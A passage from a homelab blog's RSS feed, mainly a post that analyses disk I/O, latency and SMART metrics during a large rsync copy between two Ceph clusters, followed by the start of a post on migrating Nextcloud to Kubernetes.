the end of the migration tunnel. I guess this weekend will show whether it&rsquo;s
a freight train. &#x1f605;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Ceph: My Story of Copying 1.7 TB from one Cluster to Another</title>
      <link>https://blog.mei-home.net/posts/ceph-copy-latency/</link>
      <pubDate>Tue, 04 Mar 2025 23:50:48 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/ceph-copy-latency/</guid>
      <description>Lots of plots and metrics, some grumbling. Smartctl makes an appearance as well.</description>
      <content:encoded><![CDATA[<p>A couple of weeks ago, I <a href="https://blog.mei-home.net/posts/k8s-migration-18-jellyfin/">migrated my Jellyfin instance to my Kubernetes cluster</a>.
This involved copying my approximately 1.7 TB worth of media from the baremetal
Ceph cluster to the new Rook Ceph cluster. And I&rsquo;d like to dig a bit into the
metrics and try to read them like the entrails of a slain beast during a full
moon at the top of a misty mountain. Just this much: the portents don&rsquo;t look good
for one of my HDDs.</p>
<p>So come and join me while we find out together whether I can press 30 minutes
worth of blog post out of a single rsync command. &#x1f913;</p>
<p><strong>UPDATE:</strong> Hey look there, another victory for project &ldquo;articles, not tomes&rdquo;: 17
minutes. &#x1f389;</p>
<h2 id="setting-the-table">Setting the table</h2>
<p>So what are we looking at today? The story of me executing this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rsync -av --info<span style="color:#f92672">=</span>progress2 --info<span style="color:#f92672">=</span>name0 /mnt/baremetal/* /mnt/rook/
</span></span></code></pre></div><p>This command takes my entire media collection and copies it from my baremetal
Ceph cluster to my Rook Ceph cluster.
This copy involves four physical hosts, four HDDs, a 1 Gbps switch, two VMs
and a Kubernetes cluster. The final output from the command looks like this:</p>
<pre tabindex="0"><code>sent 1,748,055,479,314 bytes  received 155,334 bytes  54,890,039.24 bytes/sec
total size is 1,853,006,549,228  speedup is 1.06
</code></pre><p>Overall, this took about 9 hours. Now, that 54 MB/s might not look too impressive,
even for spinning rust. This is, at least partially, just due to the way Ceph
works. Any write is first done to a WAL, which means there&rsquo;s some extra IOPS
required besides the write of the actual data. Plus there was some other IO
going on at the same time, and while that&rsquo;s generally pretty low in my
cluster, it still costs IOPS.</p>
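<p>As an aside: for a quick spot check of per-OSD latencies, Ceph can also be asked directly,
without going through Prometheus at all. A minimal sketch, assuming a shell with the admin
keyring (e.g. the Rook toolbox Pod):</p>
<pre tabindex="0"><code># Commit and apply latency per OSD, in milliseconds
ceph osd perf

# Cluster-wide client throughput and IOPS while the copy is running
ceph status
</code></pre>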
<p>But of course, we&rsquo;re in Meier&rsquo;s Homelab here. We don&rsquo;t need to read tea leaves.
We have 200 GB worth of Prometheus TSDB around here.</p>
<h2 id="it-aint-looking-good">It ain&rsquo;t looking good</h2>
<p>Before diving into the metrics, there&rsquo;s one problem to note: You will be seeing
that there are holes in the metrics. Quite a lot of them, in fact. Those are
there because while the copy operation was running, the Prometheus Pod was
restarted multiple times. I caught this at the beginning of the copy process.
Looking at the Pod, it got automatically restarted due to the liveness probe
failing. After every restart, it took quite a while to come up again.
And I&rsquo;m pretty sure that&rsquo;s because of the copy operation. The volume Prometheus
is using is located on the same HDD pool that the media collection was getting
copied to. And as you will see later, those HDDs were completely slammed by the
copy operation. Which is okay in general, of course. Ceph should be using all the
IOPS available to it.</p>
<p>But I found myself a bit disappointed, to be honest. I would have expected that
there was some good IO scheduling going on in Ceph. But seemingly, it allowed
other IO operations to be starved to such a degree that Prometheus repeatedly
(as in: dozens of times) failed its liveness probe.
In the Ceph logs, I saw messages about IOPS being delayed for up to 90 seconds.
It didn&rsquo;t really break anything, and the cluster stayed up through all of it -
it was just that some disk operations were really slow. So I&rsquo;m not ditching
Ceph or anything like that. I might even be wrong with my assumptions - it might
not have been IO contention, but instead network contention. But I will definitely
be looking a bit deeper into which knobs I can tune in Ceph&rsquo;s scheduling
behavior.
And also into throwing some further SSDs into my Ceph hosts to serve as RocksDB/WAL
storage for my HDD OSDs. But then there&rsquo;s actually the problem that one of my
Ceph hosts is an <a href="https://www.hardkernel.com/shop/odroid-h3/">Odroid H3</a>, which
only has two SATA ports. &#x1f644;</p>
<p>But finally enough with the text - let&rsquo;s move to the plots!</p>
<h2 id="io">I/O</h2>
<p>Let&rsquo;s begin by having a look at the IO utilization on the disks involved. As
I&rsquo;ve noted above, they&rsquo;re all HDDs. Two 2016 WD Red 4 TB, both in the baremetal cluster,
so they will only get read operations.
Then two Seagate platters, one with 8 TB and one with 4 TB. Those are the disks
which are getting written to.</p>
<p>Let&rsquo;s start with a look at the IO of the two source HDDs:
<figure>
    <img loading="lazy" src="source-io-utilization.png"
         alt="A screenshot of a Grafana time series plot. It&#39;s titled &#39;I/O utilization&#39; and shows the interval from 23:00 on one day to 09:15 the next. On the Y axis, the percentage of the I/O utilization is given. The panel contains two plots. Both start at around 2%. They go up around 23:30, the lower plot to around 40%, the higher plot to around 50%. This remains relatively stable, besides a number of spikes, most of them down to a lower percentage. Then around 04:00 both plots rise sharply, with the higher plot raising to a max of 92% and the lower plot to around 70%. They keep this higher level, again with a few spikes, until about 07:45, where they go down to around 40% and 30% respectively. Finally, at about 08:50, they fall back to around 2%."/> <figcaption>
            <p>I/O utilization of the two source HDDs on the baremetal cluster.</p>
        </figcaption>
</figure>

This plot shows the result of the following Prometheus queries:</p>
<pre tabindex="0"><code>rate(node_disk_io_time_seconds_total{instance=&#34;hostA&#34;,device=&#34;sdb&#34;}[1m])
rate(node_disk_io_time_seconds_total{instance=&#34;hostB&#34;,device=&#34;sdd&#34;}[1m])
</code></pre><p>So this is the percentage of time both HDDs spend actually serving IO. In
contrast to what I noted above, I ended up deciding to enable Grafana&rsquo;s &ldquo;Connect null values&rdquo;
option instead of leaving in the holes created by Prometheus being restarted. You
can see a pretty large gap at the beginning of the plots, from roughly 23:32
to 00:00. That&rsquo;s where I initially wanted to look at the metrics while the copy
was running, but Grafana sending queries to Prometheus was what made the liveness
probes fail for the first time, and me insisting that this should work was what
increased the length of the data gap, when compared to the others strewn throughout
the plots.
Two things are noteworthy about this plot. First, the time where the I/O suddenly
increases, from 04:00 to 07:50 or thereabouts. That wasn&rsquo;t a sudden increase
in the write throughput on the receiving cluster, but rather just the fact that
I&rsquo;ve got Ceph&rsquo;s scrubs configured for that time range. And forgot to disable
them for the occasion.
Second, note that at no point were the source HDDs actually fully loaded. So
the bottleneck wasn&rsquo;t the read speed.</p>
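<p>Should I remember it next time, scrubbing can be paused for the duration of such a copy
with the cluster-wide scrub flags. A sketch, again assuming admin access via the toolbox:</p>
<pre tabindex="0"><code># Pause (deep) scrubbing before starting the copy
ceph osd set noscrub
ceph osd set nodeep-scrub

# ... run the copy ...

# Re-enable scrubbing afterwards
ceph osd unset noscrub
ceph osd unset nodeep-scrub
</code></pre>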
<p>So what did the two target disks&rsquo; utilization look like? So glad you asked. &#x1f601;
<figure>
    <img loading="lazy" src="target-io-utilization.png"
         alt="A screenshot of a Grafana time series plot. It&#39;s titled &#39;I/O utilization&#39; and shows the interval from 23:00 on one day to 09:15 the next. On the Y axis, the percentage of the I/O utilization is given. The panel contains two plots. Both start at around 2%. They go up around 23:30, but there&#39;s a far larger difference than in the previous panel. The lower plot only goes up to around 30%, but with a relatively large fluctuation throughout the entire interval, from almost 0% as the low to 50% as the max. The higher of the two plots goes up to 100% and stays there, save for a few dips to as low as 40%. As in the previous panel, the plots go back down to around 2% - 5% around 08:50."/> <figcaption>
            <p>I/O utilization of the two target HDDs on the Rook cluster.</p>
        </figcaption>
</figure>

This plot shows a very stark difference. One of the disks is completely slammed,
while the other one is only relatively lightly loaded at around 30%, but with
large fluctuations. I will get back later to the completely slammed disk.</p>
<p>But let&rsquo;s first take a look at the disk hovering around 30%, because here I
believe I&rsquo;ve made a mistake. This disk sits in my old home server, which I reactivated
for the Kubernetes migration to provide some extra capacity. The issue now is: The
Pod doing the copying from the baremetal cluster to the Rook cluster was sitting
on a different VM on the same host. And the physical host is only connected to
the rest of the network, including the 100% disk and the two source disks,
with a 1 Gbps link. So let&rsquo;s see whether this might have been the bottleneck,
by looking at the network activity of that physical host during the copy operation:
<figure>
    <img loading="lazy" src="vm-host-networking.png"
         alt="A screenshot of a Grafana time series plot. It shows again the 23:00 to 09:30 time frame, but this time it contains network activity. There are two plots again, one for the transmit rate and one for the receive rate. Like before, both rates raise sharply at 23:30 and go down to their previous couple of Mbps values around 08:50. Between that, the receive rate reaches a maximum around 800 Mbps, while the transmit rate hovers around 500 - 600 Mbps. Both show pretty large spikes both up and down. But neither of the two plots ever reaches the 1 Gbps boundary."/> <figcaption>
            <p>Network activity for the physical 1 GbE interface connecting the VM host running one HDD OSD and the Pod running the actual transfer with the other three Ceph hosts.</p>
        </figcaption>
</figure>

My theory does not seem to pan out entirely. While yes, the receive rate on
the interface is pretty high, it&rsquo;s nowhere near saturated. I also ran an iperf
test and I can easily reach 940 Mbps between all of the hosts involved.
What I&rsquo;m wondering about a bit: Does Ceph itself have some sort of rate limiting,
to ensure that it doesn&rsquo;t entirely saturate a connection? I could at least imagine
that.
I have also checked the source hosts, and they&rsquo;re both transmitting at about
300 Mbps each, so they&rsquo;re also not saturating their network links.</p>
<p>One simple explanation could be: The Ceph pool I&rsquo;ve been writing to is a 2x
replicated pool. So each piece of data needs to be written to both HDDs. And
if one of the HDDs gets completely slammed, the other HDD would not be able to
write at its maximum speed because it wouldn&rsquo;t be able to write the second copy
of the data fast enough. I hope I remember this theory when I&rsquo;m done with the
migration and I integrate the two baremetal Ceph hosts and their disks back
into the Rook cluster. I will discuss the problematic disk/host a bit more later.</p>
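<p>For completeness, the replication factor of the target pool can be checked directly; the
pool name here is just a placeholder:</p>
<pre tabindex="0"><code># Number of replicas the pool keeps (2 in my case)
ceph osd pool get hdd-data size

# Number of replicas that must be written before a write is acknowledged
ceph osd pool get hdd-data min_size
</code></pre>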
<p>But before that, let&rsquo;s take a look at write/read I/O load on the HDDs involved
in the copy, starting with the read speeds on the source HDDs:
<figure>
    <img loading="lazy" src="bytes-read.png"
         alt="A screenshot of a Grafana time series plot. It shows again the 23:00 to 09:30 time frame. This time it is labeled &#39;Bytes read&#39; and shows the read rates on the two source HDDs for the copy operation. The rate is near zero for both until 23:30, when the copy operation starts. Then both disks ramp up to around 30 MB/s where they stay until 04:00, when the rates of both disks increase to 50 MB/s, before going down to around 25 MB/s at 07:45 and then down to zero again around 08:50."/> <figcaption>
            <p>Read rate of the two source HDDs during the copy operation.</p>
        </figcaption>
</figure>

This again shows that the copy was not constrained by the source disks. When the
Ceph scrub sets in around 04:00, both disks find another 20 MB/s in read speed.
The near-zero lines at the beginning and end show just how little reads are happening in
my cluster at night.</p>
<p>So then let&rsquo;s take a look at the write rates on the two hosts receiving the data:
<figure>
    <img loading="lazy" src="bytes-written.png"
         alt="A screenshot of a Grafana time series plot. It shows again the 23:00 to 09:30 time frame. These are the writes of the two HDDs on the receiving end of the copy operation. Both disks hover around 55 MB/s to 60 MB/s, with one of the disks showing a lot more spikes, going as low as 20 MB/s and as high as 80 MB/s."/> <figcaption>
            <p>Write rate of the two target HDDs during the copy operation.</p>
        </figcaption>
</figure>

These two plots, reading and writing, show the difference between the two
operations in a Ceph cluster. Reads can happen from both HDDs in parallel, with
both only reading at around 35 MB/s, while writing happens at approximately
the combined read rate of 55 MB/s to 60 MB/s. This is due to the fact that each piece
of data only needs to be read once, but written twice. I&rsquo;m honestly not sure why
the HDD in the one host shows such a spiky behavior in its writes, but it fits
with the IOPS graph from above. But this also shows that the issue seems to be
IOPS, not total achievable write throughput. Both receiving disks should be able
to do over 100 MB/s, but neither does, because one of the disks has its IOPS
saturated. And because the placement groups of the pool being written to are
spread among both disks, the IOPS-limited disk holds back the faster disk.</p>
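<p>To confirm that the placement groups of the pool really are spread across both of those
disks, the PG-to-OSD mapping can be listed. A sketch, again with a placeholder pool name:</p>
<pre tabindex="0"><code># List the pool&#39;s PGs together with their acting OSD sets
ceph pg ls-by-pool hdd-data

# Or look up a single PG
ceph pg map &lt;pgid&gt;
</code></pre>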
<h2 id="bad-disk">Bad disk?</h2>
<p>Let&rsquo;s think back to that one receiving disk that got slammed with 100% IO utilization
and still only had about 60 MB/s write throughput. I think that disk model is either
just bad, or my particular unit is somewhat broken. After seeing the above performance, I
decided to take a look at the OSD apply latency in both of my clusters. That&rsquo;s
the time it takes to flush an update to the disk, after it has been written to
the journal already.
For the disk in question, a Seagate 4 TB 5900 RPM model (ST4000VN008) with 64 MB of cache,
the apply latency looks like this, over the last couple of years since I installed
it in February of 2022:
<figure>
    <img loading="lazy" src="apply-latency-bad-hdd.png"
         alt="A screenshot of a Grafana time series plot. It shows the apply latency in milliseconds for the 5 OSDs in my baremetal Ceph cluster. It beings in February 2022 and goes up to April 2023. It shows plots for all five OSDs, but four of them show a very low latency in the 1 - 10 ms range. Only one OSD is absolutely consistently far above that, hovering around 50 ms for the entire interval of the graph."/> <figcaption>
            <p>Ceph apply OSD latency for the five OSDs in my baremetal cluster.</p>
        </figcaption>
</figure>

This is a pretty stark picture. The lone plot hovering around 50 ms is the same
HDD as the one which got the 100% IO utilization during the copy. In fairness,
from 2022-02 to 2022-12 it was connected to a Pi 4 8GB sitting in the official
I/O board with a SATA card in the PCIe slot. After that, it got transferred into
an Odroid H3, but did not seem to change its bad perf at all. Perhaps it got
complacent while sitting in the slow Pi and saw no reason to shape up after the
transfer into the H3? &#x1f609;
It&rsquo;s also important to note: Yes, two of the OSDs forming those indistinguishable
lines at the bottom are SSDs, but two of them are also WD Red 4 TB HDDs, 5400 RPM
drives. So it doesn&rsquo;t stand out like that because it&rsquo;s the only HDD. There are
other HDDs.</p>
<p>Having gotten curious, I ran <code>ceph tell osd.* bench</code> on my Rook Ceph cluster.
Here are the results:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>osd.0: <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_written&#34;</span>: 1073741824,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;blocksize&#34;</span>: 4194304,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;elapsed_sec&#34;</span>: 0.423324704,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_per_sec&#34;</span>: 2536449713.0788755,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;iops&#34;</span>: 604.7367365548314
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>osd.1: <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_written&#34;</span>: 1073741824,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;blocksize&#34;</span>: 4194304,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;elapsed_sec&#34;</span>: 0.348712521,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_per_sec&#34;</span>: 3079160509.9835229,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;iops&#34;</span>: 734.12907361591408
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>osd.2: <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_written&#34;</span>: 1073741824,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;blocksize&#34;</span>: 4194304,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;elapsed_sec&#34;</span>: 6.0028269730000003,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_per_sec&#34;</span>: 178872692.62125373,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;iops&#34;</span>: 42.646573214829857
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>osd.3: <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_written&#34;</span>: 1073741824,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;blocksize&#34;</span>: 4194304,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;elapsed_sec&#34;</span>: 23.502430691000001,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;bytes_per_sec&#34;</span>: 45686415.933615655,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;iops&#34;</span>: 10.892490371135629
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>The two first OSDs are the SATA SSDs, the third one is an 8 TB Seagate HDD and
the last one is the bad HDD. It&rsquo;s pretty clear that something is wrong here.
The 8 TB Seagate, <code>osd.2</code>, has 4x the IOPS of the 4 TB one. And at least from
all of the other metrics, it does look like IOPS, not e.g. CPU or networking,
is the issue.</p>
<p>Seeing that, I decided to dig even deeper, starting to worry that the disk
might be on its last legs - although it is newer than the two WD Reds I&rsquo;ve got
in the baremetal cluster. And this is what <code>smartctl -a</code> outputs:</p>
<pre tabindex="0"><code>ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
  1 Raw_Read_Error_Rate     0x000f   081   064   044    Pre-fail  Always       -       134444568
  3 Spin_Up_Time            0x0003   094   094   000    Pre-fail  Always       -       0
  4 Start_Stop_Count        0x0032   100   100   020    Old_age   Always       -       31
  5 Reallocated_Sector_Ct   0x0033   100   100   010    Pre-fail  Always       -       0
  7 Seek_Error_Rate         0x000f   088   060   045    Pre-fail  Always       -       629089568
  9 Power_On_Hours          0x0032   068   068   000    Old_age   Always       -       28425 (215 100 0)
 10 Spin_Retry_Count        0x0013   100   100   097    Pre-fail  Always       -       0
 12 Power_Cycle_Count       0x0032   100   100   020    Old_age   Always       -       30
184 End-to-End_Error        0x0032   100   100   099    Old_age   Always       -       0
187 Reported_Uncorrect      0x0032   100   100   000    Old_age   Always       -       0
188 Command_Timeout         0x0032   100   100   000    Old_age   Always       -       0
189 High_Fly_Writes         0x003a   100   100   000    Old_age   Always       -       0
190 Airflow_Temperature_Cel 0x0022   069   058   040    Old_age   Always       -       31 (Min/Max 24/35)
191 G-Sense_Error_Rate      0x0032   100   100   000    Old_age   Always       -       0
192 Power-Off_Retract_Count 0x0032   100   100   000    Old_age   Always       -       13
193 Load_Cycle_Count        0x0032   078   078   000    Old_age   Always       -       45654
194 Temperature_Celsius     0x0022   031   042   000    Old_age   Always       -       31 (0 22 0 0 0)
197 Current_Pending_Sector  0x0012   100   100   000    Old_age   Always       -       0
198 Offline_Uncorrectable   0x0010   100   100   000    Old_age   Offline      -       0
199 UDMA_CRC_Error_Count    0x003e   200   200   000    Old_age   Always       -       0
240 Head_Flying_Hours       0x0000   100   253   000    Old_age   Offline      -       26876 (182 226 0)
241 Total_LBAs_Written      0x0000   100   253   000    Old_age   Offline      -       58866038445
242 Total_LBAs_Read         0x0000   100   253   000    Old_age   Offline      -       472820704309
</code></pre><p>Look at those raw values for the Read and Seek error rates! &#x1f632;
But then I looked at the <code>VALUE</code> and <code>THRESH</code> values and started to be a bit
suspicious. Something wasn&rsquo;t adding up there, those values were looking okay.
So I started googling and came across <a href="https://www.reddit.com/r/unRAID/comments/toje8g/reminder_if_you_have_seagate_drives_and_a_high/">this reddit thread</a>,
which explains that these two values are actually multibit.
And applying the right transformation shows the real values:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>smartctl /dev/sda -a -v 1,raw48:54 -v 7,raw48:54
</span></span><span style="display:flex;"><span>ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
</span></span><span style="display:flex;"><span>  <span style="color:#ae81ff">1</span> Raw_Read_Error_Rate     0x000f   <span style="color:#ae81ff">081</span>   <span style="color:#ae81ff">064</span>   <span style="color:#ae81ff">044</span>    Pre-fail  Always       -       <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>  <span style="color:#ae81ff">7</span> Seek_Error_Rate         0x000f   <span style="color:#ae81ff">088</span>   <span style="color:#ae81ff">060</span>   <span style="color:#ae81ff">045</span>    Pre-fail  Always       -       <span style="color:#ae81ff">0</span>
</span></span></code></pre></div><p>So it doesn&rsquo;t look like the disk has any obvious issues. But the IOPS are
still absolutely abysmal and worse than the 8TB disk&rsquo;s.</p>
<p>So what now? I&rsquo;m not sure. Replace the disk and hope that the replacement
fares better? I&rsquo;m not so sure about that. I&rsquo;m also still not 100% convinced
that it isn&rsquo;t an issue of the machine it sits in. It started its life as a
disk attached to a Raspberry Pi 4. And while the performance didn&rsquo;t get any
worse when I attached it to the Odroid H3, it also did not get any better, at
all. Still, I&rsquo;m not convinced that the host doesn&rsquo;t have something to do with
it.</p>
<p>One obvious solution would be to get a new HDD. Even if the old one is actually
fine, I can just use it as a spare in case of catastrophic failure. My main
concern for a new disk would be noise - my rack is right next to my desk, where
I spend most of my free time. The disk being quiet is pretty high on my list.
So a 5400 RPM disk would be the best choice. But: I&rsquo;ve also just spent several
paragraphs complaining about low IOPS on the HDD. And a 7200 RPM disk would
definitely have more of those. I&rsquo;m undecided.</p>
<p>A completely different approach would be going with Ceph&rsquo;s ability to split
WAL/DB and data. In Ceph, each OSD (the daemon which manages a single disk) stores
four types of data. The first, which I will not discuss any further, is the OSD&rsquo;s config
data, like its Ceph auth key. If this data is lost, the OSD could still be
recovered.
The WAL, Write Ahead Log, is a couple of GB worth of data that hasn&rsquo;t been written
to the actual file store yet. The third type is the RocksDB, which stores object
metadata, like the mappings from object name to object location on disk. The
fourth type of data to be stored is the payload itself - the actual data we want
to store. Now, when a new piece of data is written, Ceph doesn&rsquo;t just need to
spend the necessary IOPS for writing the payload to the disk, but also the
mandatory entry into the WAL and the update/addition of data in the RocksDB.
All of that doesn&rsquo;t just take time and bandwidth, but also and especially IOPS.</p>
<p>By default, and this is what I currently have in both of my Ceph clusters,
the WAL and the RocksDB are co-located with the data store on the same spinning
disk. So every piece of data is written twice to the same disk - once to the WAL,
and once to the main data store. And then there&rsquo;s the cost for the metadata
update on top. Quite a lot of IOPS for a spinning disk. But with the current
BlueStore implementation for the Ceph OSDs, the DB/WAL and the actual data
storage can reside on different disks. A pretty common strategy seems to be to
take the WAL/RocksDB for an HDD OSD and putting it on an SSD. From a sizing
perspective, the rule of thumb seems to be to make the WAL/RocksDB drive 4% the
size of the OSD&rsquo;s own disk. And even a SATA SSD can easily take care of multiple
OSDs. That would definitely be an interesting option to pursue. SATA SSDs aren&rsquo;t
that expensive anymore, at least for the relatively small sizes I&rsquo;m thinking about.</p>
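<p>For a plain Ceph cluster, such a split OSD is created by pointing <code>ceph-volume</code>
at both devices. This is only a sketch with placeholder device names - in Rook, the equivalent
is configured declaratively on the CephCluster resource rather than by hand:</p>
<pre tabindex="0"><code># HDD OSD whose RocksDB/WAL lives on an SSD partition (placeholder devices)
ceph-volume lvm create --bluestore --data /dev/sdc --block.db /dev/sdb1

# The WAL can also be split out onto its own device explicitly
# ceph-volume lvm create --bluestore --data /dev/sdc --block.db /dev/sdb1 --block.wal /dev/sdb2
</code></pre>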
<p>But then again, the choice for the Odroid H3 is biting me a bit here - the board
only has two SATA connectors, and they&rsquo;re both already occupied.</p>
<p>I think this is an interesting option, but I will have to think more about it.
As the HDD doesn&rsquo;t seem to have any obvious issue and isn&rsquo;t throwing any read
errors, I&rsquo;m happy to keep it running. And to be clear, I&rsquo;m only seeing issues
during larger copy operations. In daily use, the I/O utilization only goes
above 20% during the nightly scrubs. So it will stay for now.</p>
<h2 id="the-aftermath">The Aftermath</h2>
<p>On the positive side: I have my media library on the Rook cluster. But there was
also a downside I only became aware of a couple of days after the copy, namely
this cluster level warning starting to pop up on the Rook cluster:</p>
<pre tabindex="0"><code>ceph health detail
Info: running &#39;ceph&#39; command with args: [health detail]
HEALTH_WARN 1 pgs not deep-scrubbed in time
[WRN] PG_NOT_DEEP_SCRUBBED: 1 pgs not deep-scrubbed in time
    pg 5.17 not deep-scrubbed since 2025-02-06T07:10:51.660560+0000
</code></pre><p>Deep scrubs are Ceph&rsquo;s way of ensuring data consistency. The normal scrubs
just compare checksums and such, but the deep scrubs compare the actual data
between the different copies, so they&rsquo;re pretty expensive. In my clusters,
deep scrubs are allowed to be run in the time between 04:00 and 08:00.</p>
<p>But that time might not always be enough, and deep scrubs have a lower IO priority
than normal client access to the OSDs. So during the large copy operation, deep
scrubs got so slow that some PGs fell out of the required interval for deep
scrubs. This interval is seven days by default.</p>
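<p>Both the scrub window and the deep scrub interval are plain OSD config options, so they can
be inspected and adjusted centrally. A sketch of how my 04:00 to 08:00 window maps onto them:</p>
<pre tabindex="0"><code># Restrict scrubbing to the 04:00 - 08:00 window
ceph config set osd osd_scrub_begin_hour 4
ceph config set osd osd_scrub_end_hour 8

# The &#34;not deep-scrubbed in time&#34; warning is based on this interval (default: 7 days, in seconds)
ceph config get osd osd_deep_scrub_interval
</code></pre>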
<p>When this health warning pops up, a deep scrub can be triggered outside the
configured time window with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph pg deep-scrub 5.17
</span></span></code></pre></div><p>The PG which needs deep scrubbing is given in the health warning.</p>
<p>In addition, I also had another problem, PGs stuck in deep scrub for a very
long time.
Cases like this can be identified by running the following command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph pg dump pgs | grep <span style="color:#e6db74">&#34;+scrubbing+deep&#34;</span>
</span></span><span style="display:flex;"><span>3.1 <span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>  deep scrubbing <span style="color:#66d9ef">for</span> 214s <span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span></code></pre></div><p>If the time given is very large, the scrubbing is likely stuck. I&rsquo;ve found
that the following command helps in these cases:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph pg repeer 3.1
</span></span></code></pre></div><h2 id="conclusions">Conclusions</h2>
<p>Well, as I&rsquo;ve noted above, I might need to either get a new HDD or start
thinking about implementing WAL/RocksDB separation onto an SSD for my HDD OSDs.
It isn&rsquo;t really urgent, but these slow copy operations are still bothering me -
although they happen quite infrequently.</p>
<p>Another thing I&rsquo;ve learned through all of this is that I have to come up with
a standard I/O benchmark to apply to disks before creating OSDs on them. While
I do trust the metrics and benchmark results I gave above, there was also a lot
of fluctuation in them, and not all runs showed the 4 TB Seagate to be quite
so bad.</p>
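<p>Something like a short <code>fio</code> run per disk, done before the OSD is created on it,
would probably do the job. A sketch of what I have in mind, with a placeholder device name -
note that this writes to the raw device and destroys any data on it:</p>
<pre tabindex="0"><code># Small-block random writes, roughly resembling Ceph&#39;s WAL/metadata access pattern
# WARNING: writes directly to the device and destroys its contents
fio --name=osd-precheck --filename=/dev/sdX --direct=1 --ioengine=libaio \
    --rw=randwrite --bs=4k --iodepth=16 --runtime=60 --time_based --group_reporting
</code></pre>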
<p>There&rsquo;s still a hell of a lot to learn about storage. I&rsquo;m quite happy with Ceph
and definitely don&rsquo;t want to replace it, but I still feel the need to learn a
bit more.</p>
<p>And that&rsquo;s it for today. Next up for a post will be the migration of my Mastodon instance,
which is already done at the time I&rsquo;m writing these lines.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 19: Migrating Nextcloud</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-19-nextcloud/</link>
      <pubDate>Mon, 24 Feb 2025 21:25:54 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-19-nextcloud/</guid>
      <description>Migrating my Nextcloud instance to Kubernetes</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Nextcloud instance to the k8s cluster.</p>
<p>This is part 19 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p><a href="https://nextcloud.com/">Nextcloud</a> is the oldest continuously running service
in my Homelab. It started out as an <a href="https://owncloud.com/">OwnCloud</a> deployment back
when I just called my Homelab my &ldquo;Heimserver&rdquo;. It ran continuously for more than
ten years, and I quite like it.</p>
<p>Initially I only used it for file sharing between my devices and as a better
alternative to a Samba share.
Over the years, I also started using it for contacts and calendar sharing
between my phone and desktop as well as sharing of my Firefox bookmarks between
my laptop and desktop via <a href="https://floccus.org/">Floccus</a>.
One perhaps somewhat surprising use case is for backups of OPNsense, which has
support for backing up its configuration to Nextcloud <a href="https://docs.opnsense.org/manual/how-tos/cloud_backup.html#setup-nextcloud-api-usage">out of the box</a>.</p>
<p>My most recent use case was for notes sharing. When I&rsquo;m researching something,
say a new app I&rsquo;d like to deploy in the Homelab, I like to plonk down in my
armchair with my tablet. For a long time, I then had a problem with sharing
notes between the tablet and my desktop. After some searching, I found Nextcloud&rsquo;s
<a href="https://apps.nextcloud.com/apps/notes">Notes app</a>. It isn&rsquo;t the greatest
note taking app, but it does the job adequately for what I need, allowing me
to paste some links and write some comments on them while lounging in my armchair.</p>
<h2 id="nextcloud-configuration">Nextcloud configuration</h2>
